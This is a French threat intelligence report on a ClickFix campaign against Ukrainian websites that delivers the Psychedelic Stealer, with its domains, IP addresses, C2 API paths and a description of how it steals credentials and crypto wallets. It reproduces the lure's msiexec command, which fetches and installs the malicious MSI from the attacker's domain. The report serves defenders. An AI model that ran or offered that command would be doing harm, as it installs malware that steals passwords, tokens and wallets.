Présentation
Arctic Wolf Labs a identifié une campagne ClickFix qui compromet des sites d’entreprises ukrainiennes afin d’afficher une page de vérification factice ressemblant à celle de Cloudflare. La page, rédigée en ukrainien, incite le visiteur à copier une commande msiexec.exe dans la boîte de dialogue Windows Run. L’objectif est de télécharger un fichier MSI qui déploie le malware Psychedelic Stealer.
Chaîne ClickFix et mécanisme d’injection
Le code malveillant s’insère via un iframe chargé depuis fsputnik.com/tds/tracker.js. Le script déclenche un spinner de trois secondes, puis désactive le bouton « Done » pendant environ trente‑cinq secondes, contrôlant ainsi le déroulement de l’interface sans vérifier l’exécution de la commande Windows. La commande récupère un MSI nommé elita.msi (ou miks.msi, astra.msi, harbor.msi, neon.msi, sova.msi, vyse.msi) hébergé sur le domaine uasputnik.com, enregistré le 9 septembre 2026. Exemple de commande :
msiexec /i https://uasputnik.com/elita.msiLe MSI contacte l’adresse 107.175.82.242:9000 pour récupérer le second‑stage payload psychedeliclove.exe, un exécutable 64 bits.
Analyse du stealer Psychedelic
Une fois installé, le stealer collecte les mots de passe et jetons d’authentification des navigateurs Chromium (Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex) ainsi que de Firefox. Il scanne les extensions de portefeuille crypto (MetaMask, Trust Wallet, OKX Wallet, SafePal) et les applications de bureau (Exodus, Atomic Wallet, Electrum, Bitcoin Core, Litecoin Core). Les données sont exfiltrées via des points d’accès API internes : /api/v1/ext/passwords, /api/v1/ext/tokens et /api/v1/ext/wallets. Le malware capture également des informations système via /api/v1/checkin. En modifiant les profils de navigateur et en installant un pont de messagerie native, il permet aux composants du navigateur de communiquer avec un composant local, assurant une persistance au-delà de la simple exfiltration initiale. Un processus de routine en arrière‑plan revisite les opérations liées aux extensions avant d’interroger le serveur C2 pour de nouvelles tâches, indiquant une boucle d’exécution continue.
Le stealer accepte des requêtes de tâches supplémentaires via /api/v1/agent/tasks?hwid=%s, où hwid identifie la victime. Il peut exécuter des charges utiles EXE, COM, BAT, CMD, MSI et PowerShell, offrant à l’opérateur la possibilité d’introduire d’autres maliciels.
Composants additionnels et infrastructure C2
Un tableau de bord de gestion de l’appât, nommé « РУБЛЁВКА TDS », est hébergé sur uasputnik.com. Il enregistre les interactions toutes les deux secondes, affichant 557 vues, 426 clics et 79 événements complets dans 32 pays, dont 446 vues et 351 clics en Ukraine. Le serveur C2 principal réside à 193.178.159.128:8080. Parallèlement, Blackpoint Cyber a découvert deux modules .NET livrés via la même chaîne ClickFix : RemotePanel, qui se fait passer pour le service Windows Time afin de fournir un accès à distance persistant, et BoundSiphon, un vol de credentials et de portefeuilles fonctionnant en mémoire. RemotePanel utilise un contrat BNB Smart Chain pour résoudre dynamiquement son serveur C2, ce qui rend la rotation d’infrastructure plus fluide.